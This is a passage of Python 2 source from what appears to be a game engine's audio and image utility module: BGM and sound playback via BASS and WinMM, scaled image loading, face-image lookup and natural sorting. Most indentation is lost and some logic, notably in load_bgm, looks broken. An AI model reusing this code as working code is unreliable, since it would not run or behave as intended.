self.movie_scr = pygame.Surface(cw.s(self._movie.get_size())).convert()
rect = cw.s(pygame.Rect((0, 0), self._movie.get_size()))
self._movie.set_display(self.movie_scr, rect)
self._movie.play()
except Exception:
cw.util.print_ex()
else:
                if self.subvolume != subvolume:
self.subvolume = subvolume
self.set_volume(fade=fade)
else:
self.set_volume()
if self._bass:
                # always (re)apply the loop count
cw.bassplayer.set_bgmloopcount(loopcount, channel=self.channel)
self.fpath = fpath
self.subvolume = subvolume
self.loopcount = loopcount
self.path = path
if updatepredata and cw.cwpy.sdata and cw.cwpy.sdata.pre_battleareadata and cw.cwpy.sdata.pre_battleareadata[1][3] == self.channel:
areaid, bgmpath, battlebgmpath = cw.cwpy.sdata.pre_battleareadata
bgmpath = (path, subvolume, loopcount, self.channel)
cw.cwpy.sdata.pre_battleareadata = (areaid, bgmpath, battlebgmpath)
def stop(self, fade=0):
        if threading.currentThread() != cw.cwpy:
cw.cwpy.exec_func(self.stop, fade)
return
self._stop(fade=fade, stopfadeout=True, updatepredata=True)
def _stop(self, fade, stopfadeout, updatepredata=True):
        if threading.currentThread() != cw.cwpy:
cw.cwpy.exec_func(self._stop, fade, stopfadeout)
return
assert threading.currentThread() == cw.cwpy
if cw.bassplayer.is_alivablewithpath(self.fpath):
            # BGM that is mid fade-out must also be stopped, so run the stop
            # procedure even when self._bass == False
cw.bassplayer.stop_bgm(channel=self.channel, fade=fade, stopfadeout=stopfadeout)
self._bass = False
if self._winmm:
name = "cwbgm_" + str(self.channel)
mciSendStringW = ctypes.windll.winmm.mciSendStringW
mciSendStringW(u"stop %s" % (name), 0, 0, 0)
mciSendStringW(u"close %s" % (name), 0, 0, 0)
self._winmm = False
elif self._movie:
assert self.movie_scr
self._movie.stop()
self._movie = None
self.movie_scr = None
remove_soundtempfile("Bgm")
self.fpath = ""
self.path = ""
        # release the music file loaded via pygame.mixer.music
if cw.cwpy.rsrc:
path = "DefReset"
path = find_resource(join_paths(cw.cwpy.setting.skindir, "Bgm", path), cw.cwpy.rsrc.ext_bgm)
load_bgm(path)
if updatepredata and cw.cwpy.sdata and cw.cwpy.sdata.pre_battleareadata and cw.cwpy.sdata.pre_battleareadata[1][3] == self.channel:
areaid, bgmpath, battlebgmpath = cw.cwpy.sdata.pre_battleareadata
bgmpath = (u"", 100, 0, self.channel)
cw.cwpy.sdata.pre_battleareadata = (areaid, bgmpath, battlebgmpath)
def _get_volumevalue(self, fpath):
if not cw.cwpy.setting.play_bgm:
return 0
if is_midi(fpath):
volume = cw.cwpy.setting.vol_bgm_midi
else:
volume = cw.cwpy.setting.vol_bgm
return volume * self.mastervolume / 100
def set_volume(self, volume=None, fade=0):
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self.set_volume, volume)
return
if volume is None:
volume = self._get_volumevalue(self.fpath)
volume = volume * self.subvolume / 100.0
assert threading.currentThread() == cw.cwpy
if self._bass:
cw.bassplayer.set_bgmvolume(volume, channel=self.channel, fade=fade)
elif self._movie:
self._movie.set_volume(volume)
def set_mastervolume(self, volume):
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self.set_mastervolume, volume)
return
self.mastervolume = volume
self.set_volume()
def get_path(self, path, inusecard=False):
if os.path.isabs(path):
return path
elif inusecard:
path = cw.util.join_yadodir(path)
self.inusecard = True
else:
inusepath = cw.util.get_inusecardmaterialpath(path, cw.M_MSC)
if os.path.isfile(inusepath):
path = inusepath
self.inusecard = True
else:
path = get_materialpath(path, cw.M_MSC)
self.inusecard = False
return path
class SoundInterface(object):
def __init__(self, sound=None, path="", is_midi=False):
self._sound = sound
self._path = path
self.subvolume = 100
self.channel = -1
self._type = -1
self.mastervolume = 0
self._is_midi = is_midi
def copy(self):
sound = SoundInterface()
sound._sound = self._sound
sound._path = self._path
sound.subvolume = self.subvolume
sound.channel = self.channel
sound._type = self._type
sound.mastervolume = self.mastervolume
sound._is_midi = self._is_midi
return sound
def get_path(self):
return self._path
def _play_before(self, from_scenario, channel, fade):
if from_scenario:
if cw.cwpy.lastsound_scenario[channel]:
cw.cwpy.lastsound_scenario[channel]._stop(from_scenario, fade=fade, stopfadeout=False)
cw.cwpy.lastsound_scenario[channel] = None
cw.cwpy.lastsound_scenario[channel] = self
return "Sound"
else:
if cw.cwpy.lastsound_system:
cw.cwpy.lastsound_system._stop(from_scenario, fade=fade, stopfadeout=False)
cw.cwpy.lastsound_system = None
cw.cwpy.lastsound_system = self
return "SystemSound"
def play(self, from_scenario=False, subvolume=100, loopcount=1, channel=0, fade=0):
self._type = -1
self.mastervolume = cw.cwpy.music[0].mastervolume
if self._sound and 0 <= channel and channel < cw.bassplayer.MAX_SOUND_CHANNELS:
self.channel = channel
self.subvolume = subvolume
if cw.cwpy.setting.play_sound:
volume = cw.cwpy.setting.vol_sound_midi if self._is_midi else cw.cwpy.setting.vol_sound
volume = (volume * cw.cwpy.music[0].mastervolume) / 100.0 * subvolume / 100.0
else:
volume = 0
if cw.bassplayer.is_alivablewithpath(self._path):
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self.play, from_scenario, subvolume, loopcount, channel, fade)
return
assert threading.currentThread() == cw.cwpy
tempbasedir = self._play_before(from_scenario, channel, fade)
try:
path = get_soundfilepath(tempbasedir, self._sound)
cw.bassplayer.play_sound(path, volume, from_scenario, loopcount=loopcount, channel=channel, fade=fade)
self._type = 0
except Exception:
cw.util.print_ex()
elif sys.platform == "win32" and isinstance(self._sound, (str, unicode)):
if threading.currentThread() == cw.cwpy:
cw.cwpy.frame.exec_func(self.play, from_scenario, subvolume, loopcount, channel, fade)
return
assert threading.currentThread() <> cw.cwpy
tempbasedir = self._play_before(from_scenario, channel, fade)
if from_scenario:
name = "cwsnd1_" + str(channel)
else:
name = "cwsnd2"
mciSendStringW = ctypes.windll.winmm.mciSendStringW
path = get_soundfilepath(tempbasedir, self._sound)
mciSendStringW(u'open "%s" alias %s' % (path, name), 0, 0, 0)
volume = int(volume * 1000)
mciSendStringW(u"setaudio %s volume to %s" % (name, volume), 0, 0, 0)
mciSendStringW(u"play %s" % (name), 0, 0, 0)
self._type = 1
else:
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self.play, from_scenario, subvolume, loopcount, channel, fade)
return
assert threading.currentThread() == cw.cwpy
tempbasedir = self._play_before(from_scenario, channel, fade)
def stop(self, from_scenario, fade=0):
self._stop(from_scenario, fade=fade, stopfadeout=True)
def _stop(self, from_scenario, fade, stopfadeout):
self.mastervolume = 0
if self._type <> -1 and self._sound and 0 <= self.channel and self.channel < cw.bassplayer.MAX_SOUND_CHANNELS:
if from_scenario:
tempbasedir = "Sound"
else:
tempbasedir = "SystemSound"
if self._type == 0:
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self._stop, from_scenario, fade, stopfadeout)
return
assert threading.currentThread() == cw.cwpy
try:
cw.bassplayer.stop_sound(from_scenario, channel=self.channel, fade=fade, stopfadeout=stopfadeout)
remove_soundtempfile(tempbasedir)
except Exception:
cw.util.print_ex()
elif self._type == 1:
if threading.currentThread() == cw.cwpy:
cw.cwpy.frame.exec_func(self._stop, from_scenario, fade, stopfadeout)
return
assert threading.currentThread() <> cw.cwpy
if from_scenario:
name = "cwsnd1_" + str(self.channel)
else:
name = "cwsnd2"
mciSendStringW = ctypes.windll.winmm.mciSendStringW
mciSendStringW(u"stop %s" % (name), 0, 0, 0)
mciSendStringW(u"close %s" % (name), 0, 0, 0)
remove_soundtempfile(tempbasedir)
else:
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self._stop, from_scenario, fade, stopfadeout)
return
assert threading.currentThread() == cw.cwpy
def _get_volumevalue(self, fpath):
if not cw.cwpy.setting.play_sound:
return 0
if is_midi(fpath):
volume = cw.cwpy.setting.vol_sound_midi
else:
volume = cw.cwpy.setting.vol_sound
return volume * self.mastervolume / 100.0
def set_mastervolume(self, from_scenario, volume):
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self.set_mastervolume, from_scenario, volume)
return
self.mastervolume = volume
self.set_volume(from_scenario)
def set_volume(self, from_scenario, volume=None):
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self.set_volume, from_scenario, volume)
return
if self._type == -1:
return
if volume is None:
volume = self._get_volumevalue(self._path)
volume = volume * self.subvolume / 100.0
assert threading.currentThread() == cw.cwpy
if self._type == 0:
cw.bassplayer.set_soundvolume(volume, from_scenario, channel=self.channel, fade=0)
elif self._type == 1:
volume = int(volume * 1000)
mciSendStringW = ctypes.windll.winmm.mciSendStringW
if from_scenario:
name = "cwsnd1_" + str(self.channel)
else:
name = "cwsnd2"
mciSendStringW(u"setaudio %s volume to %s" % (name, volume), 0, 0, 0)
elif self._type == 2:
self._sound.set_volume(volume)
#-------------------------------------------------------------------------------
# General-purpose functions
#-------------------------------------------------------------------------------
def init(size_noscale=None, title="", fullscreen=False, soundfonts=None, fullscreensize=(0, 0)):
"""pygame初期化。"""
if sys.platform == "win32":
        # FIXME: SDL silently adds a US keyboard layout to the Windows
        # language settings, so remove it only when the layout list has grown.
        # This probably no longer happens with SDL2, so this workaround
        # should be removable after an upgrade.
active = win32api.GetKeyboardLayout(0)
hkls = set()
for hkl in win32api.GetKeyboardLayoutList():
hkls.add(hkl)
pygame.display.init()
for hkl in win32api.GetKeyboardLayoutList():
if not hkl in hkls:
p = ctypes.c_void_p(hkl)
ctypes.windll.user32.UnloadKeyboardLayout(p)
else:
pygame.display.init()
pygame.font.init()
#pygame.joystick.init()
flags = 0
size = cw.s(size_noscale)
if fullscreen:
scr_fullscreen = pygame.display.set_mode(fullscreensize, flags)
scr = pygame.Surface(size).convert()
scr_draw = scr
else:
scr_fullscreen = None
scr = pygame.display.set_mode(cw.wins(size_noscale), flags)
if cw.UP_WIN == cw.UP_SCR:
scr_draw = scr
else:
scr_draw = pygame.Surface(size).convert()
clock = pygame.time.Clock()
if title:
pygame.display.set_caption(title)
pygame.event.set_blocked(None)
pygame.event.set_allowed([KEYDOWN, KEYUP, MOUSEBUTTONDOWN, MOUSEBUTTONUP, USEREVENT])
    # Initialize BASS Audio (it may not be usable).
if soundfonts is None:
soundfonts = [(cw.DEFAULT_SOUNDFONT, True, 100)]
soundfonts = [(sfont[0], sfont[2]/100.0) for sfont in soundfonts if sfont[1]]
cw.bassplayer.init_bass(soundfonts)
return scr, scr_draw, scr_fullscreen, clock
def convert_maskpos(maskpos, width, height):
"""maskposが座標ではなくキーワード"center"または"right"
であった場合、それぞれ画像の中央、右上の座標を返す。
"""
if isinstance(maskpos, str):
if maskpos == "center":
maskpos = (width / 2, height / 2)
elif maskpos == "right":
maskpos = (width - 1, 0)
else:
raise Exception("Invalid maskpos: %s" % (maskpos))
return maskpos
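# Illustrative checks, in this file's inline-assert style (values follow
# directly from the definition above):
assert convert_maskpos("center", 10, 20) == (5, 10)
assert convert_maskpos("right", 10, 20) == (9, 0)
assert convert_maskpos((3, 4), 10, 20) == (3, 4)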
def get_scaledimagepaths(path, can_loaded_scaledimage):
"""(スケーリングされたファイル名, スケール)のlistを返す。
listには1倍スケールを示す(path, 1)が必ず含まれる。
"""
seq = [(path, 1)]
if can_loaded_scaledimage:
spext = os.path.splitext(path)
for scale in cw.SCALE_LIST:
fname = u"%s.x%d%s" % (spext[0], scale, spext[1])
seq.append((fname, scale))
return seq
def copy_scaledimagepaths(frompath, topath, can_loaded_scaledimage):
"""frompathをtopathへコピーする。
その後、ファイル名に".xN"をつけたイメージを探し、
実際に存在するファイルであればコピーする。
"""
shutil.copy2(frompath, topath)
fromspext = os.path.splitext(frompath)
if can_loaded_scaledimage and fromspext[1].lower() in cw.EXTS_IMG:
tospext = os.path.splitext(topath)
for scale in cw.SCALE_LIST:
fname = u"%s.x%d%s" % (fromspext[0], scale, fromspext[1])
fname = cw.cwpy.rsrc.get_filepath(fname)
if os.path.isfile(fname):
fname2 = u"%s.x%d%s" % (tospext[0], scale, tospext[1])
shutil.copy2(fname, fname2)
def remove_scaledimagepaths(fpath, can_loaded_scaledimage, trashbox=False):
"""fpathと共にfpathがスケーリングされたイメージファイルを全て削除する。
"""
if not os.path.isfile(fpath):
return
remove(fpath, trashbox=trashbox)
fpathext = os.path.splitext(fpath)
if can_loaded_scaledimage and fpathext[1].lower() in cw.EXTS_IMG:
for scale in cw.SCALE_LIST:
fname = "%s.x%d%s" % (fpathext[0], scale, fpathext[1])
fname = cw.cwpy.rsrc.get_filepath(fname)
if fname and os.path.isfile(fname):
remove(fname, trashbox=trashbox)
def find_scaledimagepath(path, up_scr, can_loaded_scaledimage, noscale):
"""ファイル名に".xN"をつけたイメージを探して(ファイル名, スケール値)を返す。
例えば"file.bmp"に対する"file.x2.bmp"を探す。
"""
scale = 1
if cw.binary.image.path_is_code(path):
return path, scale
path = cw.util.join_paths(path)
if not noscale and (can_loaded_scaledimage or\
path.startswith(cw.util.join_paths(cw.tempdir, u"ScenarioLog/TempFile") + u"/") or\
path.startswith(cw.util.join_paths(cw.cwpy.skindir, u"Table") + u"/")):
scale = int(math.pow(2, int(math.log(up_scr, 2))))
spext = os.path.splitext(path)
while 2 <= scale:
fname = u"%s.x%d%s" % (spext[0], scale, spext[1])
fname = cw.cwpy.rsrc.get_filepath(fname)
if os.path.isfile(fname):
path = fname
break
scale /= 2
return path, scale
def find_noscalepath(path):
"""pathが"file.x2.bmp"のようなスケール付きイメージのものであれば
".xN"の部分を取り除いて返す。
ただし取り除いた後のファイルが実在しない場合はそのまま返す。
"""
scales = u"|".join(map(lambda s: str(s), cw.SCALE_LIST))
exts = u"|".join(map(lambda s: s.replace(".", "\\."), cw.EXTS_IMG))
result = re.match(u"\\A(.+)\.x(%s)(%s)\\Z" % (scales, exts), path, re.IGNORECASE)
if result:
fpath = result.group(1) + result.group(3)
if os.path.isfile(fpath):
path = fpath
return path
def load_image(path, mask=False, maskpos=(0, 0), f=None, retry=True, isback=False, can_loaded_scaledimage=True,
noscale=False, up_scr=None, use_excache=False):
"""pygame.Surface(読み込めなかった場合はNone)を返す。
path: 画像ファイルのパス。
mask: True時、(0,0)のカラーを透過色に設定する。透過画像の場合は無視される。
"""
#assert threading.currentThread() == cw.cwpy
if cw.cwpy.rsrc:
path = cw.cwpy.rsrc.get_filepath(path)
if up_scr is None:
up_scr = cw.UP_SCR
if use_excache and path:
        # Images updated by JPDC shooting etc. are not officially swapped in
        # until the event ends, so use the cache until then.
npath = os.path.normcase(os.path.normpath(os.path.abspath(path)))
if cw.cwpy.sdata and npath in cw.cwpy.sdata.ex_cache:
caches = cw.cwpy.sdata.ex_cache[npath]
data = None
up_scr2 = 1
for i, scale in enumerate(itertools.chain((1,), cw.SCALE_LIST)):
if caches[i]:
data = caches[i]
up_scr2 = scale
if scale == up_scr:
break
up_scr = up_scr2
if data:
f = io.BytesIO(data)
if not f:
path, up_scr = find_scaledimagepath(path, up_scr, can_loaded_scaledimage, noscale)
bmpdepth = 0
try:
if f:
try:
pos = f.tell()
d16 = f.read(16)
isbmp = get_imageext(d16) == ".bmp"
ispng = get_imageext(d16) == ".png"
isgif = get_imageext(d16) == ".gif"
isjpg = get_imageext(d16) == ".jpg"
f.seek(pos)
image = pygame.image.load(f, "")
except:
image = pygame.image.load(f, path)
elif cw.binary.image.path_is_code(path):
data = cw.binary.image.code_to_data(path)
ext = get_imageext(data)
isbmp = ext == ".bmp"
ispng = ext == ".png"
isgif = ext == ".gif"
isjpg = ext == ".jpg"
if ext == ".bmp":
data = cw.image.patch_rle4bitmap(data)
bmpdepth = cw.image.get_bmpdepth(data)
with io.BytesIO(data) as f2:
image = pygame.image.load(f2)
f2.close()
if ext == ".bmp":
image = cw.imageretouch.patch_alphadata(image, ext, data)
else:
if not os.path.isfile(path):
return pygame.Surface((0, 0)).convert()
ext = os.path.splitext(path)[1].lower()
isbmp = ext == ".bmp"
ispng = ext == ".png"
isgif = ext == ".gif"
isjpg = ext in (".jpg", ".jpeg")
if ext == ".bmp":
with open(path, "rb") as f2:
data = f2.read()
f2.close()
bmpdepth = cw.image.get_bmpdepth(data)
data = cw.image.patch_rle4bitmap(data)
data, _ok = cw.image.fix_cwnext32bitbitmap(data)
with io.BytesIO(data) as f2:
image = pygame.image.load(f2)
f2.close()
else:
with open(path, "rb") as f2:
data = f2.read()
f2.close()
with io.BytesIO(data) as f2:
image = pygame.image.load(f2)
f2.close()
if ext == ".bmp":
image = cw.imageretouch.patch_alphadata(image, ext, data)
except:
print_ex()
#print u"画像が読み込めません(load_image)。リトライします", path
if retry:
try:
if f:
f.seek(0)
data = f.read()
elif cw.binary.image.path_is_code(path):
data = cw.binary.image.code_to_data(path)
else:
if not os.path.isfile(path):
return pygame.Surface((0, 0)).convert()
with open(path, "rb") as f2:
data = f2.read()
f2.close()
if not ispng:
bmpdepth = cw.image.get_bmpdepth(data)
data, _ok = cw.image.fix_cwnext32bitbitmap(data)
data, _ok = cw.image.fix_cwnext16bitbitmap(data)
with io.BytesIO(data) as f2:
r = load_image(path, mask, maskpos, f2, False, isback=isback, can_loaded_scaledimage=can_loaded_scaledimage,
noscale=noscale, up_scr=up_scr)
f2.close()
return r
except:
print_ex()
#print u"画像が読み込めません(リトライ後)", path
return pygame.Surface((0, 0)).convert()
    # If a transparent image with an alpha channel was loaded,
    # the SRCALPHA (0x00010000) flag is on.
if (bmpdepth in (0, 32)) and (image.get_flags() & pygame.locals.SRCALPHA):
image = image.convert_alpha()
else:
imageb = image
if image.get_bitsize() <= 8 and image.get_colorkey() and not isgif and isback:
            # BUG: on some environments, masking an image cell corrupts the transparent color (issue #723)
mask = False
if isjpg and isback and not (cw.cwpy and cw.cwpy.sdata and cw.cwpy.sct.lessthan("1.30", cw.cwpy.sdata.get_versionhint())):
            # BUG: the mask setting of JPEG images is ignored
            # (CardWirth 1.50)
mask = False
        # BUG: convert() on a paletted image turns every pixel of the
        # same color transparent (CardWirth 1.50).
        if not (bmpdepth == 16 and isbmp):  # BUG: mask color has no effect on 16-bit bitmaps (pygame 1.9.4)
image = image.convert()
        # Card images in PNG format ignore the mask color (CardWirth 1.50 behavior).
if image.get_colorkey() and ispng and not isback:
image.set_colorkey(None)
if mask and image.get_colorkey() and isgif:
        # 256-color GIFs always enforce the top-left mask color.
if imageb.get_bitsize() <= 8:
maskpos = convert_maskpos(maskpos, image.get_width(), image.get_height())
image.set_colorkey(image.get_at(maskpos), pygame.locals.RLEACCEL)
    elif mask and not image.get_colorkey():  # skip formats like PNG that already define their own mask color
maskpos = convert_maskpos(maskpos, image.get_width(), image.get_height())
image.set_colorkey(image.get_at(maskpos), pygame.locals.RLEACCEL)
if not ispng and bmpdepth == 1 and mask and not isback or up_scr <> 1:
image = Depth1Surface(image, up_scr, bmpdepth)
return image
class Depth1Surface(pygame.Surface):
def __init__(self, surface, scr_scale, bmpdepth=24):
pygame.Surface.__init__(self, surface.get_size(), surface.get_flags(), surface.get_bitsize(), surface.get_masks())
self.blit(surface, (0, 0), special_flags=pygame.locals.BLEND_RGBA_ADD)
colorkey = surface.get_colorkey()
self.set_colorkey(colorkey, pygame.locals.RLEACCEL)
self.bmpdepthis1 = surface.bmpdepthis1 if hasattr(surface, "bmpdepthis1") else (bmpdepth == 1)
self.scr_scale = scr_scale
def copy(self):
bmp = Depth1Surface(pygame.Surface.copy(self), self.scr_scale)
bmp.bmpdepthis1 = self.bmpdepthis1
return bmp
def convert_alpha(self):
bmp = Depth1Surface(pygame.Surface.convert_alpha(self), self.scr_scale, bmpdepth=32)
bmp.bmpdepthis1 = False
return bmp
def calc_imagesize(image):
"""imageのデータサイズを概算する。
結果は正確ではない。
"""
return image.get_bitsize() * image.get_width() * image.get_height() // 8
def calc_wxbmpsize(wxbmp):
"""wx.Bitmapのデータサイズを概算する。
結果は正確ではない。
"""
return wxbmp.GetDepth() * wxbmp.GetWidth() * wxbmp.GetHeight() // 8
def put_number(image, num):
"""アイコンサイズの画像imageの上に
numの値を表示する。
"""
image = image.convert_alpha()
s = str(num)
if len(s) == 1:
font = cw.cwpy.rsrc.fonts["statusimg1"]
elif len(s) == 2:
font = cw.cwpy.rsrc.fonts["statusimg2"]
else:
font = cw.cwpy.rsrc.fonts["statusimg3"]
h = font.get_height()
w = (h+1) / 2
subimg = pygame.Surface((len(s)*w, h)).convert_alpha()
subimg.fill((0, 0, 0, 0))
x = image.get_width() - subimg.get_width() - cw.s(1)
y = image.get_height() - subimg.get_height()
pos = (x, y)
for i, c in enumerate(s):
cimg = font.render(c, 2 <= cw.UP_SCR, (0, 0, 0))
image.blit(cimg, (pos[0]+1 + i*w, pos[1]+1))
image.blit(cimg, (pos[0]+1 + i*w, pos[1]-1))
image.blit(cimg, (pos[0]-1 + i*w, pos[1]+1))
image.blit(cimg, (pos[0]-1 + i*w, pos[1]-1))
image.blit(cimg, (pos[0]+1 + i*w, pos[1]))
image.blit(cimg, (pos[0]-1 + i*w, pos[1]))
image.blit(cimg, (pos[0] + i*w, pos[1]+1))
image.blit(cimg, (pos[0] + i*w, pos[1]-1))
cimg = font.render(c, 2 <= cw.UP_SCR, (255, 255, 255))
image.blit(cimg, (pos[0] + i*w, pos[1]))
return image
def get_imageext(b):
"""dataが画像であれば対応する拡張子を返す。"""
if 22 < len(b) and 'B' == b[0] and 'M' == b[1]:
return ".bmp"
if 25 <= len(b) and 0x89 == ord(b[0]) and 'P' == b[1] and 'N' == b[2] and 'G' == b[3]:
return ".png"
if 10 <= len(b) and 'G' == b[0] and 'I' == b[1] and 'F' == b[2]:
return ".gif"
if 6 <= len(b) and 0xFF == ord(b[0]) and 0xD8 == ord(b[1]):
return ".jpg"
if 10 <= len(b):
if 'M' == b[0] and 'M' == b[1] and 42 == ord(b[3]):
return ".tiff"
elif 'I' == b[0] and 'I' == b[1] and 42 == ord(b[2]):
return ".tiff"
return ""
def get_facepaths(sexcoupon, agecoupon, adddefaults=True):
"""sexとageに対応したFaceディレクトリ内の画像パスを辞書で返す。
辞書の内容は、(ソートキー, ディレクトリ, ディレクトリ表示名)をキーにした
当該ディレクトリ内のファイルパスのlistとなる。
sexcoupon: 性別クーポン。
agecoupon: 年代クーポン。
adddefaults: 1件もなかった場合、Resource/Image/Cardにある
FATHERまたはMOTHERを使用する。
"""
imgpaths = {}
sex = ""
for f in cw.cwpy.setting.sexes:
if sexcoupon == u"_" + f.name:
sex = f.subname
age = ""
for f in cw.cwpy.setting.periods:
if agecoupon == u"_" + f.name:
age = f.abbr
    dpaths = []  # (sort key, displayed path, actual path)
    facedir1 = cw.util.join_paths(cw.cwpy.skindir, u"Face")  # bundled with the skin
    facedir2 = u"Data/Face"  # shared by all skins
for i, facedir in enumerate((facedir1, facedir2)):
def add(weight, dpath1):
dpath = join_paths(facedir, dpath1)
if i == 0:
name = cw.cwpy.setting.skinname
else:
name = cw.cwpy.msgs["common"]
dpaths.append((i * 10 + weight, u"<%s> %s" % (name, dpath1), dpath))
        # restricted to sex and age
        if sex and age:
            add(0, sex + u"-" + age)
        # restricted to sex
        if sex:
            add(1, sex)
        # restricted to age
        if age:
            add(2, u"Common-" + age)
        # generic
        add(3, u"Common")
passed = set()
_get_facepaths(facedir, imgpaths, dpaths, passed)
if not imgpaths and adddefaults:
seq = []
dpath = join_paths(cw.cwpy.skindir, u"Resource/Image/Card")
for sex in cw.cwpy.setting.sexes:
if u"_" + sex.name == sexcoupon:
if sex.father:
fpath = join_paths(dpath, "FATHER")
fpath = find_resource(fpath, cw.M_IMG)
seq.append(fpath)
if sex.mother:
fpath = join_paths(dpath, "MOTHER")
fpath = find_resource(fpath, cw.M_IMG)
seq.append(fpath)
break
if seq:
imgpaths[(dpath, u"Resource/Image/Card")] = seq
return imgpaths
def _get_facepaths(facedir, imgpaths, dpaths, passed):
for sortkey, showdpath, dpath in dpaths:
if not os.path.isdir(dpath):
continue
abs = os.path.abspath(dpath)
abs = os.path.normpath(abs)
abs = os.path.normcase(abs)
if abs in passed:
continue
passed.add(abs)
        dpaths2 = []
seq = []
scales = u"|".join(map(lambda s: str(s), cw.SCALE_LIST))
re_xn = re.compile(u"\\A.+\.x(%s)\\Z" % (scales), re.IGNORECASE)
for fname in os.listdir(dpath):
path1 = join_paths(dpath, fname)
path = get_linktarget(path1)
if os.path.isfile(path):
spext = os.path.splitext(path)
ext = spext[1].lower()
if ext in cw.EXTS_IMG and not re_xn.match(spext[0]):
seq.append(path)
elif os.path.isdir(path):
showpath = join_paths(showdpath, fname)
if sys.platform == "win32" and path1 <> path and showpath.lower().endswith(".lnk"):
showpath = os.path.splitext(showpath)[0]
dpaths2.append((sortkey, showpath, path))
if seq:
p = join_paths(relpath(dpath, facedir))
if p.startswith("../"):
p = dpath
imgpaths[(sortkey, showdpath, join_paths(p))] = seq
if dpaths2:
_get_facepaths(facedir, imgpaths, dpaths2, passed)
def load_bgm(path):
"""Pathの音楽ファイルをBGMとして読み込む。
リピートして鳴らす場合は、cw.audio.MusicInterface参照。
winmm.dllを利用して再生する場合は1(Windowsのみ)、
bass.dllを利用して再生する場合は2、
失敗した場合は-1を返す。
path: 音楽ファイルのパス。
"""
if threading.currentThread() <> cw.cwpy:
raise Exception()
if cw.cwpy.rsrc:
path = cw.cwpy.rsrc.get_filepath(path)
    if not os.path.isfile(path) or not cw.bassplayer.is_alivablewithpath(path):
        return -1
if cw.util.splitext(path)[1].lower() in (".mpg", ".mpeg"):
return 1
if cw.bassplayer.is_alivablewithpath(path):
return 2
path = get_soundfilepath("Bgm", path)
cw.util.print_ex()
print u"BGMが読み込めません", path
return -1
def load_sound(path):
"""効果音ファイルを読み込み、SoundInterfaceを返す。
読み込めなかった場合は、無音で再生するSoundInterfaceを返す。
path: 効果音ファイルのパス。
"""
if threading.currentThread() <> cw.cwpy:
raise Exception()
if cw.cwpy.rsrc:
path = cw.cwpy.rsrc.get_filepath(path)
if not os.path.isfile(path) or not cw.bassplayer.is_alivablewithpath(path):
return SoundInterface()
if cw.cwpy.is_playingscenario() and path in cw.cwpy.sdata.resource_cache:
return cw.cwpy.sdata.resource_cache[path].copy()
try:
assert threading.currentThread() == cw.cwpy
if cw.bassplayer.is_alivablewithpath(path):
            # BASS is available
sound = SoundInterface(path, path, is_midi=is_midi(path))
elif sys.platform == "win32" and (path.lower().endswith(".wav") or\
path.lower().endswith(".mp3")):
            # Use WinMM to work around SDL_mixer problems.
            # FIXME: mp3 sound effects can only be played on Windows.
sound = SoundInterface(path, path, is_midi=is_midi(path))
else:
return SoundInterface()
except:
print u"サウンドが読み込めません", path
return SoundInterface()
if cw.cwpy.is_playingscenario():
cw.cwpy.sdata.sweep_resourcecache(os.path.getsize(path) if os.path.isfile(path) else 0)
cw.cwpy.sdata.resource_cache[path] = sound
return sound.copy()
def is_midi(path):
"""pathがMIDIファイルか判定する。"""
try:
if os.path.isfile(path) and 4 <= os.path.getsize(path):
with open(path, "rb") as f:
return f.read(4) == "MThd"
except:
pass
return os.path.splitext(path)[1].lower() in (".mid", ".midi")
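# Illustrative checks; the file names below are assumed not to exist,
# so only the extension fallback is exercised:
assert is_midi(u"__missing__.mid")
assert not is_midi(u"__missing__.ogg")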
def get_soundfilepath(basedir, path):
"""宿のフォルダにある場合は問題が出るため、
再生用のコピーを生成する。
"""
if path and cw.cwpy.ydata and (path.startswith(cw.cwpy.ydata.yadodir) or\
path.startswith(cw.cwpy.ydata.tempdir)):
dpath = join_paths(cw.tempdir, u"Playing", basedir)
fpath = os.path.basename(path)
fpath = join_paths(dpath, fpath)
fpath = cw.binary.util.check_duplicate(fpath)
if not os.path.isdir(dpath):
os.makedirs(dpath)
shutil.copyfile(path, fpath)
path = fpath
return path
def remove_soundtempfile(basedir):
"""再生用のコピーを削除する。
"""
dpath = join_paths(cw.tempdir, u"Playing", basedir)
if os.path.isdir(dpath):
remove(dpath)
if not os.listdir(join_paths(cw.tempdir, u"Playing")):
remove(dpath)
def _sorted_by_attr_impl(d, seq, *attr):
if attr:
get = operator.attrgetter(*attr)
else:
get = lambda a: a
re_num = re.compile(u"( *[0-9]+ *)| +")
str_table = {}
class LogicalStr(object):
def __init__(self, s):
self.seq = []
if not s:
return
pos = 0
self.s = s
while s <> u"":
m = re_num.search(s, pos=pos)
if m is None:
self.seq.append(s[pos:].lower())
break
si = m.start()
ei = m.end()
self.seq.append(s[pos:si].lower())
ss = s[si:ei]
if ss.isspace():
self.seq.append((0, ss))
else:
self.seq.append((int(ss), ss))
pos = ei
def __cmp__(self, other):
r = cmp(self.seq, other.seq)
if r:
return r
return cmp(self.s, other.s)
def logical_cmp_str(a, b):
if not (isinstance(a, (str, unicode)) and isinstance(b, (str, unicode))):
return cmp(a, b)
if a in str_table:
al = str_table[a]
else:
al = LogicalStr(a)
str_table[a] = al
if b in str_table:
bl = str_table[b]
else:
bl = LogicalStr(b)
str_table[b] = bl
return cmp(al, bl)
def logical_cmp_impl(a, b):
if (isinstance(a, tuple) and isinstance(b, tuple)) or\
(isinstance(a, list) and isinstance(b, list)):
r = 0
for i in xrange(max(len(a), len(b))):
if len(a) <= i:
return -1
if len(b) <= i:
return 1
aval = a[i]
bval = b[i]
r = logical_cmp_impl(aval, bval)
if r <> 0:
break
return r
else:
r = logical_cmp_str(a, b)
return r
def logical_cmp(aobj, bobj):
a = get(aobj)
b = get(bobj)
return logical_cmp_impl(a, b)
if d:
seq.sort(key=functools.cmp_to_key(logical_cmp))
return seq
else:
return sorted(seq, key=functools.cmp_to_key(logical_cmp))
def cmp2(a, b):
    #PyLite: TODO: renamed because saving raised an error
if a is None and b is None:
return 0
elif a is None:
return -1
elif b is None:
return 1
elif type(a) is type(b):
if a < b:
return -1
elif b < a:
return 1
else:
if type(a) is int:
return -1
else:
return 1
return 0
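# Illustrative checks, in this file's inline-assert style: None sorts
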